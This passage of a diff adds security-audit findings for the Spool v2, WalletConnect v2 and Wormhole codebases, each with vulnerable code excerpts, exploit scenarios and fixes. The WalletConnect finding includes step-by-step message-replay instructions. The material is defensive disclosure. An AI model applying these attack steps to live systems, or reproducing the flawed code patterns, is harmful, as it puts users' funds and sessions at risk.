● StrategyRegistry.setTreasuryFee
● StrategyRegistry.setTreasuryFeeReceiver
● Strategy.doHardWork
● RewardManager.addToken
● RewardManager.extendRewardEmission

Exploit Scenario
The Spool system experiences a security incident, but the Spool team has trouble reconstructing the sequence of events causing the incident because of missing log information.

Recommendations
Short term, add events for all operations that may contribute to a higher level of monitoring and alerting.
Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.

+33. Removal of a strategy could result in loss of funds
Severity: Medium Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-33
Target: managers/SmartVaultManager.sol

Description
A Spool admin can remove a strategy from the system, which will be replaced by a ghost strategy in all smart vaults that use it; however, if a strategy is removed when the system is in specific states, funds to be deposited or withdrawn in the next "do hard work" cycle will be lost.

If the following sequence of events occurs, the deposited assets will be lost from the removed strategy:
1. A user deposits assets into a smart vault.
2. The flush function is called. The StrategyRegistry._assetsDeposited[strategy][xxx][yyy] storage variable now has assets to send to the given strategy in the next "do hard work" cycle.
3. The strategy is removed.
4. doHardWork is called, but the assets for the removed strategy are locked in the master wallet because the function can be called only for valid strategies.

If the following sequence of events occurs, the assets withdrawn from a removed strategy will be lost:
1. doHardWork is called.
2. The strategy is removed before a smart vault sync is done.

Exploit Scenario
Multiple smart vaults use strategy A. Users deposited a total of $1 million, and $300,000 should go to strategy A. Strategy A is removed due to an issue in the third-party protocol. All of the $300,000 is locked in the master wallet.

Recommendations
Short term, modify the associated code to properly handle deposited and withdrawn funds when strategies are removed.
Long term, improve the system's unit and integration tests: consider all of the possible transaction sequences in the system's state and test them to ensure their correct behavior.

+34. ExponentialAllocationProvider reverts on strategies without risk scores
Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-34
Target: providers/ExponentialAllocationProvider.sol

Description
The ExponentialAllocationProvider.calculateAllocation function can revert due to a division-by-zero error when a strategy's risk score has not been set by the risk provider. The risk variable in calculateAllocation represents the risk score set by the risk provider for the given strategy, represented by the index i. Ghost strategies can be passed to the function.
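As a hedged illustration of the guard recommended at the end of this finding (the original code follows in figure 34.1), entries with an unset risk score could simply be skipped instead of triggering the division:

    // Illustrative sketch only: treat an unset (zero) risk score as an
    // excluded strategy rather than dividing by zero; results[i] stays 0.
    for (uint8 i; i < data.apys.length; ++i) {
        if (data.riskScores[i] == 0) {
            continue; // e.g., a removed (ghost) strategy
        }
        [...]
        int256 risk = fromUint(data.riskScores[i]);
        results[i] = uint256(div(apy, risk));
        resultSum += results[i];
    }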
If a ghost strategy’s risk score has not been set (which is likely, as there would be no reason to set one), the function will revert with a division-by-zero error. function calculateAllocation(AllocationCalculationInput calldata data) external pure returns ( uint256 [] memory ) { if (data.apys.length != data.riskScores.length) { revert ApysOrRiskScoresLengthMismatch(data.apys.length, data.riskScores.length); } [...] for ( uint8 i; i < data.apys.length; ++i) { [...] int256 risk = fromUint(data.riskScores[i]); results[i] = uint256 ( div(apy, risk) ); resultSum += results[i]; } Figure 34.1: A snippet of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L309–L340 Exploit Scenario A strategy is removed from a smart vault that uses the ExponentialAllocationProvider contract. Bob, who has the ROLE_ALLOCATOR role, calls reallocate ; however, it reverts, and the smart vault is impossible to reallocate. Recommendations Short term, modify the calculateAllocation function so that it properly handles strategies with uninitialized risk scores. Long term, improve the unit and integration tests for the allocators. Refactor the codebase so that ghost strategies are not passed to the calculateAllocator function. +35. Removing a strategy makes the smart vault unusable Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-35 Target: managers/DepositManager.sol Description Removing a strategy from a smart vault causes every subsequent deposit transaction to revert, making the smart vault unusable. The deposit function of the SmartVaultManager contract calls the depositAssets function on the DepositManager contract. The depositAssets function calls the checkDepositRatio function, which takes an argument called strategyRatios : function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns ( uint256 [] memory , uint256 ) { ... // check if assets are in correct ratio checkDepositRatio( bag.assets, SpoolUtils.getExchangeRates(bag2.tokens, _priceFeedManager), bag2.allocations, SpoolUtils.getStrategyRatiosAtLastDhw(bag2.strategies, _strategyRegistry) ); ... return (_vaultDeposits[bag.smartVault][bag2.flushIndex].toArray(bag2.tokens.length), depositId); } Figure 35.1: The depositAssets function in spool-v2-core/DepositManager.sol The value of strategyRatios is fetched from the StrategyRegistry contract, which returns an empty array on ghost strategies. 
This empty array is then used in a for loop in the calculateFlushFactors function:

function calculateFlushFactors(
    uint256[] memory exchangeRates,
    uint16a16 allocation,
    uint256[][] memory strategyRatios
) public pure returns (uint256[][] memory) {
    uint256[][] memory flushFactors = new uint256[][](strategyRatios.length);

    // loop over strategies
    for (uint256 i; i < strategyRatios.length; ++i) {
        flushFactors[i] = new uint256[](exchangeRates.length);

        uint256 normalization = 0;
        // loop over assets
        for (uint256 j = 0; j < exchangeRates.length; j++) {
            normalization += strategyRatios[i][j] * exchangeRates[j];
        }

        // loop over assets
        for (uint256 j = 0; j < exchangeRates.length; j++) {
            flushFactors[i][j] = allocation.get(i) * strategyRatios[i][j] * PRECISION_MULTIPLIER / normalization;
        }
    }

    return flushFactors;
}

Figure 35.2: The calculateFlushFactors function in spool-v2-core/DepositManager.sol

The statement calculating the value of normalization tries to access an index of the empty array and reverts with the Index out of bounds error, causing the deposit function to revert for every transaction thereafter.

Exploit Scenario
A Spool admin removes a strategy from a smart vault. Because of the presence of a ghost strategy, users' deposit transactions into the smart vault revert with the Index out of bounds error.

Recommendations
Short term, modify the calculateFlushFactors function so that it skips ghost strategies in the loop used to calculate the value of normalization.
Long term, review the entire codebase, check the effects of removing strategies from smart vaults, and ensure that all of the functionality works for smart vaults with one or more ghost strategies.

+36. Issues with the management of access control roles in deployment script
Severity: Low Difficulty: Low Type: Access Controls Finding ID: TOB-SPL-36
Target: script/DeploySpool.s.sol

Description
The deployment script does not properly manage or assign access control roles. As a result, the protocol will not work as expected, and the protocol's contracts cannot be upgraded. The deployment script has multiple issues regarding the assignment or transfer of access control roles. It fails to grant certain roles and to revoke temporary roles on deployment:
● Ownership of the ProxyAdmin contract is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, making the smart contracts non-upgradeable.
● The DEFAULT_ADMIN_ROLE role is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, leaving no way to manage roles after deployment.
● The ADMIN_ROLE_STRATEGY role is not assigned to the StrategyRegistry contract, which is required to grant the ROLE_STRATEGY role to a strategy contract. Because of this, new strategies cannot be registered.
● The ADMIN_ROLE_SMART_VAULT_ALLOW_REDEEM role is not assigned to the SmartVaultFactory contract, which is required to grant the ROLE_SMART_VAULT_ALLOW_REDEEM role to smartVault contracts.
● The ROLE_SMART_VAULT_MANAGER and ROLE_MASTER_WALLET_MANAGER roles are not assigned to the DepositManager and WithdrawalManager contracts, making them unable to move funds from the master wallet contract.

We also found that the ROLE_SMART_VAULT_ADMIN role is not assigned to the smart vault owner when a new smart vault is created. This means that smart vault owners will not be able to manage their smart vaults.
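For illustration, a hedged sketch of the kind of post-deployment wiring the script needs. The role constants match those named in this finding, but the surrounding script structure, contract variable names, and the protocolMultisig and deployer addresses are placeholders, not the project's code:

    // Illustrative deployment-script sketch of the missing wiring.
    // Grant the admin roles the registries and factory need:
    accessControl.grantRole(ADMIN_ROLE_STRATEGY, address(strategyRegistry));
    accessControl.grantRole(ADMIN_ROLE_SMART_VAULT_ALLOW_REDEEM, address(smartVaultFactory));

    // Let the managers move funds from the master wallet:
    accessControl.grantRole(ROLE_SMART_VAULT_MANAGER, address(depositManager));
    accessControl.grantRole(ROLE_MASTER_WALLET_MANAGER, address(depositManager));
    accessControl.grantRole(ROLE_SMART_VAULT_MANAGER, address(withdrawalManager));
    accessControl.grantRole(ROLE_MASTER_WALLET_MANAGER, address(withdrawalManager));

    // Hand over administrative control once setup is complete
    // (renounceRole must be called by the deployer account itself):
    proxyAdmin.transferOwnership(protocolMultisig);
    accessControl.grantRole(accessControl.DEFAULT_ADMIN_ROLE(), protocolMultisig);
    accessControl.renounceRole(accessControl.DEFAULT_ADMIN_ROLE(), deployer);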
Exploit Scenario
The Spool team deploys the smart contracts using the deployment script, but due to the issues described in this finding, the team is not able to perform the required role management and upgrades.

Recommendations
Short term, modify the deployment script so that it does the following on deployment:
● Transfers ownership of the ProxyAdmin contract to an EOA, multisig wallet, or DAO
● Transfers the DEFAULT_ADMIN_ROLE role to an EOA, multisig wallet, or DAO
● Grants the required roles to the smart contracts
● Allows the SmartVaultFactory contract to grant the ROLE_SMART_VAULT_ADMIN role to owners of newly created smart vaults
Long term, document all of the system's roles and interactions between components that require privileged roles. Make sure that all of the components are granted their required roles following the principle of least privilege to keep the protocol secure and functioning as expected.

+37. Risk of DoS due to unbounded loops
Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-37
Target: managers/SmartVaultManager.sol

Description
Guards and actions are run in unbounded loops. A smart vault creator can add too many guards and actions, potentially trapping the deposit and withdrawal functionality due to a lack of gas. The runGuards function calls all the configured guard contracts in a loop:

function runGuards(address smartVaultId, RequestContext calldata context) external view {
    if (guardPointer[smartVaultId][context.requestType] == address(0)) {
        return;
    }

    GuardDefinition[] memory guards = _readGuards(smartVaultId, context.requestType);

    for (uint256 i; i < guards.length; ++i) {
        GuardDefinition memory guard = guards[i];

        bytes memory encoded = _encodeFunctionCall(smartVaultId, guard, context);
        (bool success, bytes memory data) = guard.contractAddress.staticcall(encoded);
        _checkResult(success, data, guard.operator, guard.expectedValue, i);
    }
}

Figure 37.1: The runGuards function in spool-v2-core/GuardManager.sol

Multiple conditions can cause this loop to run out of gas:
● The vault creator adds too many guards.
● One of the guard contracts consumes a high amount of gas.
● A guard starts consuming a high amount of gas after a specific block or at a specific state.

If user transactions reach out-of-gas errors due to these conditions, smart vaults can become unusable, and funds can become stuck in the protocol. A similar issue affects the runActions function in the ActionManager contract.

Exploit Scenario
Eve creates a smart vault with an upgradeable guard contract. Later, when users have made large deposits, Eve upgrades the guard contract to consume all of the available gas to trap user deposits in the smart vault for as long as she wants.

Recommendations
Short term, model all of the system's variable-length loops, including the ones used by runGuards and runActions, to ensure they cannot block contract execution within expected system parameters.
Long term, carefully audit operations that consume a large amount of gas, especially those in loops.

+38. Unsafe casts throughout the codebase
Severity: Undetermined Difficulty: Undetermined Type: Data Validation Finding ID: TOB-SPL-38
Target: src/

Description
The codebase contains unsafe casts that could cause mathematical errors if they are reachable in certain states. Examples of possible unsafe casts are shown in figures 38.1 and 38.2.
function flushSmartVault(
    address smartVault,
    uint256 flushIndex,
    address[] calldata strategies,
    uint16a16 allocation,
    address[] calldata tokens
) external returns (uint16a16) {
    [...]
    _flushShares[smartVault][flushIndex].flushSvtSupply = uint128(ISmartVault(smartVault).totalSupply());

    return _strategyRegistry.addDeposits(strategies, distribution);
}

Figure 38.1: A possible unsafe cast in spool-v2-core/DepositManager.sol#L220

function syncDeposits(
    address smartVault,
    uint256[3] calldata bag,
    // uint256 flushIndex,
    // uint256 lastDhwSyncedTimestamp,
    // uint256 oldTotalSVTs,
    address[] calldata strategies,
    uint16a16[2] calldata dhwIndexes,
    address[] calldata assetGroup,
    SmartVaultFees calldata fees
) external returns (DepositSyncResult memory) {
    [...]
    if (syncResult.mintedSVTs > 0) {
        _flushShares[smartVault][bag[0]].mintedVaultShares = uint128(syncResult.mintedSVTs);
        [...]
    }
    return syncResult;
}

Figure 38.2: A possible unsafe cast in spool-v2-core/DepositManager.sol#L243

Recommendations
Short term, review the codebase to identify all of the casts that may be unsafe. Analyze whether these casts could be a problem in the current codebase and, if they are unsafe, make the necessary changes to make them safe.
Long term, when implementing potentially unsafe casts, always include comments to explain why those casts are safe in the context of the codebase.

diff --git a/findings_newupdate/tob/2023-03-walletconnectv2-securityreview.txt b/findings_newupdate/tob/2023-03-walletconnectv2-securityreview.txt
new file mode 100644
index 0000000..412d0c2
--- /dev/null
+++ b/findings_newupdate/tob/2023-03-walletconnectv2-securityreview.txt
@@ -0,0 +1,7 @@
+1. Use of outdated dependencies
Severity: Informational Difficulty: Undetermined Type: Patching Finding ID: TOB-WCSDK-1
Target: walletconnect-monorepo, walletconnect-utils

Description
We used npm audit and lerna-audit to detect the use of outdated dependencies in the codebase. These tools discovered a number of vulnerable packages that are referenced by the package-lock.json files. The following tables describe the vulnerable dependencies used in the walletconnect-utils and walletconnect-monorepo repositories:

walletconnect-utils Dependencies Vulnerability Report
Dependency | Vulnerability | Description | Vulnerable Versions
glob-parent | CVE-2020-28469 | Regular expression denial of service in enclosure regex | < 5.1.2
minimatch | CVE-2022-3517 | Regular expression denial of service when calling the braceExpand function with specific arguments | < 3.0.5
nanoid | CVE-2021-23566 | Exposure of sensitive information to an unauthorized actor in nanoid | 3.0.0–3.1.

walletconnect-monorepo Dependencies Vulnerability Report
Dependency | Vulnerability | Description | Vulnerable Versions
flat | CVE-2020-36632 | flat vulnerable to prototype pollution | < 5.0.1
minimatch | CVE-2022-3517 | Regular expression denial of service when calling the braceExpand function with specific arguments | < 3.0.5
request | CVE-2023-28155 | Bypass of SSRF mitigations via an attacker-controlled server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP) | <= 2.88.2

In many cases, the use of a vulnerable dependency does not necessarily mean the application is vulnerable. Vulnerable methods from such packages need to be called within a particular (exploitable) context. To determine whether the WalletConnect SDK is vulnerable to these issues, each issue will have to be manually triaged.
While these specific libraries were outdated at the time of the review, there were already checks in place as part of the CI/CD pipeline of application development of WalletConnect to keep track of these issues. Recommendations Short term, update the project dependencies to their latest versions wherever possible. Use tools such as retire.js , npm audit , and yarn audit to confirm that no vulnerable dependencies remain. +2. No protocol-level replay protections in WalletConnect Severity: Undetermined Difficulty: High Type: Cryptography Finding ID: TOB-WCSDK-2 Target: WalletConnect v2 protocol Description Applications and wallets using WalletConnect v2 can exchange messages using the WalletConnect protocol through a public WebSocket relay server. Exchanged data is encrypted and authenticated with keys unknown to the relay server. However, using dynamic testing during the audit, we observed that the protocol does not protect against replay attacks. The WalletConnect authentication protocol is essentially a challenge-response protocol between users and servers, where users produce signatures using the private keys from their wallets. A signature is performed over a message containing, among many other components, a nonce value chosen by the server. This nonce value is intended presumably to prevent an adversary from replaying an old signature that a user generated to authenticate themselves. However, there does not seem to be any validation against this nonce value (except validation that it exists), so the library would accept replayed signatures. In addition to missing validation of the nonce value, the payload for the signature does not appear to include the pairing topic for the pairing established between a user and the server. Because the authentication protocol runs only over an existing pairing, it would make sense to include the pairing topic value inside the signature payload. Doing so would prevent a malicious user from replaying another user’s previously generated signature for a new pairing that they establish with the server. To repeat our experiment that uncovered this issue, pair the React App demo application with the React Wallet demo application and intercept the traffic generated from the React App demo application (e.g., use a local proxy such as BurpSuite). Initiate a transaction from the application, capture the data sent through the WebSocket channel, and confirm the transaction in the wallet. A sample captured message is shown in figure 2.1. Now, edit the message field slightly and add “==” to the end of the string (“=” is the Base64 padding character). Finally, replay (resend) the captured data. A new confirmation dialog box should appear in the wallet. { "id" : 1680643717702847 , "jsonrpc" : "2.0" , "method" : "irn_publish" , "params" : { "topic" : "42507dee006fe8(...)2d797cccf8c71fa9de4" , "message" : "AFv70BclFEn6MteTRFemaxD7Q7(...)y/eAPv3ETRHL0x86cJ6iflkIww" , "ttl" : 300 , "prompt" : true , "tag" : 1108 } } Figure 2.1: A sample message sent from the dApp This finding is of undetermined severity because it is not obvious whether and how an attacker could use this vulnerability to impact users. When this finding was originally presented to the WalletConnect team, the recommended remediation was to track and enforce the correct nonce values. However, due to the distributed nature of the WalletConnect system, this could prove difficult in practice. In response, we have updated our recommendation to use timestamps instead. 
Timestamps are not as effective as nonces are for preventing replay attacks because it is not always possible to have a secure clock that can be relied upon. However, if nonces are infeasible to implement, timestamps are the next best option. Recommendations Short term, update the implementation of the authentication protocol to include timestamps in the signature payload that are then checked against the current time (within a reasonable window of time) upon signature validation. In addition to this, include the pairing topic in the signature payload. Long term, consider including all relevant pairing and authentication data in the signature payload, such as sender and receiver public keys. If possible, consider using nonces instead of timestamps to more effectively prevent replay attacks. +3. Key derivation code could produce keys composed of all zeroes Severity: Informational Difficulty: High Type: Cryptography Finding ID: TOB-WCSDK-3 Target: walletconnect-monorepo/packages/utils/src/crypto.ts Description The current implementation of the code that derives keys using the x25519 library does not enable the rejectZero option. If the counterparty is compromised, this may result in a derived key composed of all zeros, which could allow an attacker to observe or tamper with the communication. export function deriveSymKey(privateKeyA: string , publicKeyB: string ): string { const sharedKey = x25519.sharedKey( fromString(privateKeyA, BASE16), fromString(publicKeyB, BASE16), ); const hkdf = new HKDF(SHA256, sharedKey); const symKey = hkdf.expand(KEY_LENGTH); return toString(symKey, BASE16); } Figure 3.1: The code that derives keys using x25519.sharedKey ( walletconnect-monorepo/packages/utils/src/crypto.ts#35–43 ) The x25519 library includes a warning about this case: /** * Returns a shared key between our secret key and a peer's public key. * * Throws an error if the given keys are of wrong length. * * If rejectZero is true throws if the calculated shared key is all-zero . * From RFC 7748: * * > Protocol designers using Diffie-Hellman over the curves defined in * > this document must not assume "contributory behavior". Specially, * > contributory behavior means that both parties' private keys * > contribute to the resulting shared key. Since curve25519 and * > curve448 have cofactors of 8 and 4 (respectively), an input point of * > small order will eliminate any contribution from the other party's * > private key. This situation can be detected by checking for the all- * > zero output, which implementations MAY do, as specified in Section 6. * > However, a large number of existing implementations do not do this. * * IMPORTANT: the returned key is a raw result of scalar multiplication. * To use it as a key material, hash it with a cryptographic hash function. */ Figure 3.2: Warnings in x25519.sharedKey ( stablelib/packages/x25519/x25519.ts#595–615 ) This finding is of informational severity because a compromised counterparty would already allow an attacker to observe or tamper with the communication. Exploit Scenario An attacker compromises the web server on which a dApp is hosted and introduces malicious code in the front end that makes it always provide a low-order point during the key exchange. When a user connects to this dApp with their WalletConnect-enabled wallet, the derived key is all zeros. The attacker passively captures and reads the exchanged messages. Recommendations Short term, enable the rejectZero flag for uses of the deriveSymKey function. 
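By way of comparison, here is a minimal, self-contained Go sketch of the same derivation (this is not WalletConnect code; it assumes the golang.org/x/crypto modules). In Go's implementation, curve25519.X25519 rejects an all-zero shared secret by default, which is the behavior the rejectZero flag opts into in stablelib:
package main

import (
    "crypto/sha256"
    "fmt"
    "io"

    "golang.org/x/crypto/curve25519"
    "golang.org/x/crypto/hkdf"
)

// deriveSymKey mirrors the TypeScript code in figure 3.1. curve25519.X25519
// returns an error when the computed shared secret is all zeros (e.g., when
// the peer supplied a low-order point), so "contributory behavior" is enforced.
func deriveSymKey(privateKeyA, publicKeyB []byte) ([]byte, error) {
    shared, err := curve25519.X25519(privateKeyA, publicKeyB)
    if err != nil {
        return nil, fmt.Errorf("contributory behavior violated: %w", err)
    }
    // Hash the raw scalar-multiplication result before using it as key material.
    symKey := make([]byte, 32)
    if _, err := io.ReadFull(hkdf.New(sha256.New, shared, nil, nil), symKey); err != nil {
        return nil, err
    }
    return symKey, nil
}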
Long term, when using cryptographic primitives, research any edge cases they may have and always review relevant implementation notes. Follow recommended practices and include any defense-in-depth safety checks to ensure the protocol operates as intended.
+4. Insecure storage of session data in local storage Severity: Medium Difficulty: High Type: Data Exposure Finding ID: TOB-WCSDK-4 Target: Browser storage Description HTML5 local storage is used to hold session data, including keychain values. Because there are no access controls on modifying and retrieving this data using JavaScript, data in local storage is vulnerable to XSS attacks. Figure 4.1: Keychain data stored in a browser’s localStorage Exploit Scenario Alice discovers an XSS vulnerability in a dApp that supports WalletConnect. This vulnerability allows Alice to retrieve the dApp’s keychain data, allowing her to propose new transactions to the connected wallet. Recommendations Short term, consider using cookies to store and send tokens. Use available cross-site request forgery (CSRF) protection libraries to mitigate CSRF attacks. Ensure that cookies are tagged with httpOnly, and preferably secure, to ensure that JavaScript cannot access them. References ● OWASP HTML5 Security Cheat Sheet: Local Storage
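As a general illustration of the recommended cookie flags (a server-side sketch in Go, not WalletConnect's API; all names are hypothetical):
package main

import "net/http"

// setSessionCookie issues a session token in a cookie that JavaScript cannot
// read (HttpOnly) and that is only sent over TLS (Secure).
func setSessionCookie(w http.ResponseWriter, token string) {
    http.SetCookie(w, &http.Cookie{
        Name:     "session",
        Value:    token,
        HttpOnly: true,                     // inaccessible to scripts, mitigating XSS token theft
        Secure:   true,                     // sent only over HTTPS
        SameSite: http.SameSiteStrictMode,  // helps mitigate CSRF
        Path:     "/",
    })
}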
A. Vulnerability Categories
The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.
Vulnerability Categories
Category | Description
Access Controls | Insufficient authorization or assessment of rights
Auditing and Logging | Insufficient auditing of actions or logging of problems
Authentication | Improper identification of users
Configuration | Misconfigured servers, devices, or software components
Cryptography | A breach of system confidentiality or integrity
Data Exposure | Exposure of sensitive information
Data Validation | Improper reliance on the structure or values of data
Denial of Service | A system failure with an availability impact
Error Reporting | Insecure or insufficient reporting of error conditions
Patching | Use of an outdated software package or library
Session Management | Improper identification of authenticated users
Testing | Insufficient test methodology or test coverage
Timing | Race conditions or other order-of-operations flaws
Undefined Behavior | Undefined behavior triggered within the system
Severity Levels
Severity | Description
Informational | The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined | The extent of the risk was not determined during this engagement.
Low | The risk is small or is not one the client has indicated is important.
Medium | User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High | The flaw could affect numerous users and have serious reputational, legal, or financial implications.
Difficulty Levels
Difficulty | Description
Undetermined | The difficulty of exploitation was not determined during this engagement.
Low | The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium | An attacker must write an exploit or will need in-depth knowledge of the system.
High | An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.
B. Code Maturity Categories
The following tables describe the code maturity categories and rating criteria used in this document.
Code Maturity Categories
Category | Description
Arithmetic | The proper use of mathematical operations and semantics
Auditing | The use of event auditing and logging to support monitoring
Authentication / Access Controls | The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system
Complexity Management | The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Configuration | The configuration of system components in accordance with best practices
Cryptography and Key Management | The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Data Handling | The safe handling of user inputs and data processed by the system
Documentation | The presence of comprehensive and readable codebase documentation
Maintenance | The timely maintenance of system components to mitigate risk
Memory Safety and Error Handling | The presence of memory safety and robust error-handling mechanisms
Testing and Verification | The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage
Rating Criteria
Rating | Description
Strong | No issues were found, and the system exceeds industry standards.
Satisfactory | Minor issues were found, but the system is compliant with best practices.
Moderate | Some issues that may affect system safety were found.
Weak | Many issues that affect system safety were found.
Missing | A required component is missing, significantly affecting system safety.
Not Applicable | The category is not applicable to this review.
Not Considered | The category was not considered in this review.
Further Investigation Required | Further investigation is required to reach a meaningful conclusion.
diff --git a/findings_newupdate/tob/2023-03-wormhole-securityreview.txt b/findings_newupdate/tob/2023-03-wormhole-securityreview.txt new file mode 100644 index 0000000..d81f95f --- /dev/null +++ b/findings_newupdate/tob/2023-03-wormhole-securityreview.txt @@ -0,0 +1,17 @@ +1. Lack of doc comments Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-WORMGUWA-1 Target: node/pkg/governor/governor.go, various source files in node/pkg/watchers Description Publicly accessible functions within the governor and watcher code generally lack doc comments. Inadequately documented code can be misunderstood, which increases the likelihood of an improper bug fix or a mis-implemented feature. There are ten publicly accessible functions within governor.go. However, only one such function has a comment preceding it (see figure 1.1).
// Returns true if the message can be published, false if it has been added to the pending list.
func (gov *ChainGovernor) ProcessMsg(msg *common.MessagePublication) bool {
Figure 1.1: node/pkg/governor/governor.go#L281–L282
Similarly, there are at least 28 publicly accessible functions among the non-evm watchers. However, only seven of them are preceded by doc comments, and only one of the seven is not in the Near watcher code (see figure 1.2).
// GetLatestFinalizedBlockNumber() returns the latest published block.
func (s *SolanaWatcher) GetLatestFinalizedBlockNumber() uint64 {
Figure 1.2: node/pkg/watchers/solana/client.go#L846–L847
Go’s official documentation on doc comments states the following: A func’s doc comment should explain what the function returns or, for functions called for side effects, what it does. Exploit Scenario Alice, a Wormhole developer, implements a new node feature involving the governor. Alice misunderstands how the functions called by her new feature work. Alice introduces a vulnerability into the node as a result. Recommendations Short term, add doc comments to each function that is accessible from outside of the package in which the function is defined. This will facilitate code review and reduce the likelihood that a developer introduces a bug into the code because of a misunderstanding. Long term, regularly review code comments to ensure they are accurate. Documentation must be kept up to date to be beneficial. References ● Go Doc Comments +2. Fields protected by mutex are not documented Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-WORMGUWA-2 Target: node/pkg/governor/governor.go Description The fields protected by the governor’s mutex are not documented. A developer adding functionality to the governor is unlikely to know whether the mutex must be locked for their application. The ChainGovernor struct appears in figure 2.1. The Wormhole Foundation communicated to us privately that the mutex protects the fields highlighted in yellow. Note that, because there are 13 fields in ChainGovernor (not counting the mutex itself), the likelihood of a developer guessing exactly the set of highlighted fields is small.
type ChainGovernor struct {
    db                    db.GovernorDB
    logger                *zap.Logger
    mutex                 sync.Mutex
    tokens                map[tokenKey]*tokenEntry
    tokensByCoinGeckoId   map[string][]*tokenEntry
    chains                map[vaa.ChainID]*chainEntry
    msgsSeen              map[string]bool // Key is hash, payload is consts transferComplete and transferEnqueued.
    msgsToPublish         []*common.MessagePublication
    dayLengthInMinutes    int
    coinGeckoQuery        string
    env                   int
    nextStatusPublishTime time.Time
    nextConfigPublishTime time.Time
    statusPublishCounter  int64
    configPublishCounter  int64
}
Figure 2.1: node/pkg/governor/governor.go#L119–L135
Exploit Scenario Alice, a Wormhole developer, adds a new function to the governor.
● Case 1: Alice does not lock the mutex, believing that her function operates only on fields that are not protected by the mutex. However, by not locking the mutex, Alice introduces a race condition into the governor.
● Case 2: Alice locks the mutex “just to be safe.” However, the fields on which Alice’s function operates are not protected by the mutex. Alice introduces a deadlock into the code as a result.
Recommendations Short term, document the fields within ChainGovernor that are protected by the mutex. This will reduce the likelihood that a developer incorrectly locks, or does not lock, the mutex. Long term, regularly review code comments to ensure they are accurate. Documentation must be kept up to date to be beneficial.
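One common documentation convention is to group the guarded fields directly under the mutex. The sketch below illustrates the idea only; which fields belong in the guarded group is an assumption here, not the actual protected set:
package governor

import "sync"

// chainGovernor sketches a layout convention for documenting lock scope.
type chainGovernor struct {
    // Immutable after construction; safe for concurrent reads.
    dayLengthInMinutes int
    coinGeckoQuery     string

    // mu guards every field below it, to the end of the struct.
    mu            sync.Mutex
    msgsSeen      map[string]bool
    msgsToPublish []string // simplified element type for illustration
}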
+3. Potential nil pointer dereference in reloadPendingTransfer Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-WORMGUWA-3 Target: node/pkg/governor/governor_db.go Description A potential nil pointer dereference exists in reloadPendingTransfer. The bug could be triggered if invalid data were stored within a node’s database, and could make it impossible to restart the node. The relevant code appears in figures 3.1 and 3.2. When DecodeTransferPayloadHdr returns an error, the payload that is also returned is used to construct the error message (figure 3.1). However, as shown in figure 3.2, the returned payload can be nil.
payload, err := vaa.DecodeTransferPayloadHdr(msg.Payload)
if err != nil {
    gov.logger.Error("cgov: failed to parse payload for reloaded pending transfer, dropping it",
        zap.String("MsgID", msg.MessageIDString()),
        zap.Stringer("TxHash", msg.TxHash),
        zap.Stringer("Timestamp", msg.Timestamp),
        zap.Uint32("Nonce", msg.Nonce),
        zap.Uint64("Sequence", msg.Sequence),
        zap.Uint8("ConsistencyLevel", msg.ConsistencyLevel),
        zap.Stringer("EmitterChain", msg.EmitterChain),
        zap.Stringer("EmitterAddress", msg.EmitterAddress),
        zap.Stringer("tokenChain", payload.OriginChain),
        zap.Stringer("tokenAddress", payload.OriginAddress),
        zap.Error(err),
    )
    return
}
Figure 3.1: node/pkg/governor/governor_db.go#L90–L106
func DecodeTransferPayloadHdr(payload []byte) (*TransferPayloadHdr, error) {
    if !IsTransfer(payload) {
        return nil, fmt.Errorf("unsupported payload type")
    }
Figure 3.2: sdk/vaa/structs.go#L962–L965
Exploit Scenario Eve finds a code path that allows her to store erroneous payloads within the database of Alice’s node. Alice is unable to restart her node, as it tries to dereference a nil pointer on each attempt. Recommendations Short term, either eliminate the use of payload when constructing the error message, or verify that the payload is not nil before attempting to dereference it. This will eliminate a potential nil pointer dereference.
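A minimal sketch of the second option, guarding the payload-derived log fields behind a nil check (field and helper names follow the snippets above; this is a patch-style fragment, not a drop-in fix):
payload, err := vaa.DecodeTransferPayloadHdr(msg.Payload)
if err != nil {
    fields := []zap.Field{
        zap.String("MsgID", msg.MessageIDString()),
        zap.Error(err),
        // ... remaining msg-derived fields from figure 3.1 ...
    }
    if payload != nil { // guard against the nil return shown in figure 3.2
        fields = append(fields,
            zap.Stringer("tokenChain", payload.OriginChain),
            zap.Stringer("tokenAddress", payload.OriginAddress))
    }
    gov.logger.Error("cgov: failed to parse payload for reloaded pending transfer, dropping it", fields...)
    return
}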
Long term, add tests to exercise additional error paths within governor_db.go. This could help to expose bugs like this one. +4. Unchecked type assertion in queryCoinGecko Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-WORMGUWA-4 Target: node/pkg/governor/governor_prices.go Description The code that processes CoinGecko responses contains an unchecked type assertion. The bug is triggered when CoinGecko returns invalid data, and could be exploited for denial of service (DoS). The relevant code appears in figure 4.1. The data object that is returned as part of CoinGecko’s response to a query is cast to a map m of type map[string]interface{} (yellow). However, the cast’s success is not verified. As a result, a nil pointer dereference can occur when m is accessed (red).
m := data.(map[string]interface{})
if len(m) != 0 {
    var ok bool
    price, ok = m["usd"].(float64)
    if !ok {
        gov.logger.Error("cgov: failed to parse coin gecko response, reverting to configured price for this token", zap.String("coinGeckoId", coinGeckoId))
